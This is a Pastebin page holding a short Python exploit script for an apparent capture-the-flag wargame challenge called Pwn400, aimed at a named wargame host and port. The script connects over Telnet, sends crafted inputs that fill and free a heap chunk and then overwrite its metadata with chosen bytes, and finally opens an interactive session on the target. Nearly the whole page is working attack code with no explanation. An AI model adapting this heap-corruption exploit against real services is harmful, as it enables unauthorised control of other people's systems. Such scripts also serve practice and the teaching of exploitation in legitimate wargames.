Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- from Pwning import *
- class Pwn400(Payload):
- def __init__(self):
- Payload.__init__(self)
- self.host[1] = 'lab33.wargame.whitehat.vn' # my Target host
- self.port = 9400 # my Target port
- self.mode = 1 # x86 target platform
- # self.mode = 1 x86_64 target platform
- self.conn = Telnet(self.host[1],self.port)
- def pwnTarget(self):
- input1 = "u#" + "A"*1022 # create heap with size 0x410, and free it
- input2 = "o<1060>" + "\x00\x80"*7 + "\x00\x88" + "\x00\x10" + "\x56\x01" + "\x08\x01" + "\x40\x01"
- input2+= "\x00\x05" + "B"*(1024 - len(input2))
- self.conn.read_until('Input string 1\n')
- self.conn.writeRawData(input1)
- self.conn.read_until('Input string 2\n')
- self.conn.writeRawData("AA#" + "D"*1021)
- self.conn.read_until('Processing\n')
- self.conn.read_until('Input string 1\n')
- self.conn.writeRawData(input2)
- self.conn.read_until('Input string 2\n')
- self.conn.writeRawData("B"*1024)
- self.conn.interact()
- self.conn.close()
- pwn400 = Pwn400()
- pwn400.pwnTarget()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement